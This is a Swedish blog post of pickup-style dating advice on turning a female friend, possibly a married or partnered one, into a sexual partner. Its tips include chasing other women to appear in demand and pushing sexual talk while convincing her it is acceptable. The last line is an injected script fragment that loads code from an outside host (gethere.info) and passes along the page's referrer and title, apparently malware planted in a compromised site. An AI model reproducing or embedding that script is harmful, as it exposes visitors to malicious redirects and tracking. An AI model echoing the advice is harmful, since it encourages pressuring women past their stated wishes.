friends only 300x171 Kompisfacket
Är det möjligt att bygga något sexuellt med en tjej som man gillar och som man endast träffat som vän?.

Det är möjligt om du vet vad du ska göra, men även då så funkar det inte varje gång.
Vissa tjejer kommer hålla kvar dig som vän därför att du antagligen varit för skraj för att visa sexuelltintresse eller gjort en hel del misstag och avfärdat hennes tankar om att se dig som mer än bara som en vän.

I vilket fall så sitter du i kompis facket och har ingen aning om hur du ska ta dig ut. Det kan handla om tjejer som är gifta eller i ett förhållanden, eller den bittra sanningen att de helt enkelt inte tycker om dig och låter dig hänga runt bara för att de inte har något bättre för sig. Att vända den sortens förhållandet till något sexuellt kommer inte alltid att lyckas men du kommer åtminstone få bort dem ur ditt liv och styra om tankarna till kvinnor som är intresserade istället.

Så vad kan man göra?

Jaga andra kvinnor

Om du vill vända en tjejkompis till en älskarinna är det enormt viktigt att hon inte är ditt enda ”hopp i livet för sex”. Du ska jaga andra tjejer, flurta med andra, dejta andra och ha sex med andra. Att träffa andra och vara bra på det är enda sättet att känna frihet kring den kompis som du kärat ner dig i. Det kommer ge dig en skänsla av ro kring henne och att bort känslan av desperation som du upplever när du är med henne. Det kommer även göra dig mindre tillgänglig. Det kommer göra dig till att vara förvald av andra kvinnor och därmed mer attraktiv i hennes ögon.

Bete dig som en älskare inte som hennes vännina

Det är ingen skillnad i beteendet på en man som blir henne kompis gentemot hennes vänninor. Du blir helt enkelt en av hennes vänninor. Om du vill att hon ser dig som en sexuell man istället för ” fulvännina” Så måste du bete dig annorlunda än vad hennes vänninor skulle göra. Detta gäller förbåde tjejer som du precis träffat eller dem du känt ett tag och placerat dig i kompisfacket. DU MÅSTE FLURTA MED HENNE!!!! Oavsett om det kommer att kännas kontigt de första gångerna du gör det. Så måste du FLURTA med henne.
sexandthdoubleecitysplash 468x459 1 300x294 Kompisfacket
En man i kompisfacket, hamnar där oftast därför han väntat för länge på att hon ska känna sig bekväm innan han visat intresse. Detta leder till osäkerhet och kan kommer att uppfattas svag i henner ögon, alltid nervös och väntande på att hon ska slappna av innan han gör det. Han flurtar inte med henne eller säger något sexuellt därför att han inte vill riskera att få henne känna dig obekväm. Endast om han ser de rätta signalerna så kommer han flurta. Vilket är självklart bäddat för misslyckande.

Om du vill att hon ser dig som en sexuell man så måste du vara villig att övertyga henne att allt som sägs i interaktionen med henne är ok även om det är sexuellt. Detta innebär att först tror du själv att det är ok och låter sedan henne veta det. Du agerar inte som om det vore ett problem. Du agera som att allt är cool. Hon kommer antagligen att titta på ditt beteende för att veta hur hon ska känna om saker du säger och dessutom kommer det hjälpa henne att slappna av. Men bara om du är schill….

Var positiv och ha mycket att göra.
Om du är dreprimerad runt tjejer som du vill ha sex med. Du gnäller om ditt liv och generellt är sur. Så måste du sluta med det omdelbart. Du måste få henne att tänka. ”Wow han verkar glad utan mig”? Det bäst jag tar en bit av kakan.. istället för” Wow den killen är en riktig tragedi” Du måste verka upptagen, som om det händer mycket i ditt liv. Det bästa sättet att vara det är att jaga andra kvinnor.

Vägra att stanna i kompisfällan

Följer du ovanstående steg så kommer saker och ting förändras. Du kommer att upplevasen mer sexuell vib med den tjej som satt dig i kompisfällan. Hon kommer antagligen att säga följande. ”Du har förändrats” eller så kommer hon låte dig få veta att du aldrig kommer vara mer än en vän. Om detta händer så måste du sluta hänga med henne och informera henne utan att dröja att du är inte är ok med att vara hennes vännina. Sedan slutar du hänga runt henne, det kommer vara enormt positiv för din självkänsla som man.
womanmansexual 257x300 Kompisfacket

Fall inte tillbaka
Om hon blir sexuell med dig, så kanske du blir frestad att falla tillbaka och bli en vän med henne. GÖR INTE DET.

Ha en skön Måndag

-Gustavo (Superman)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;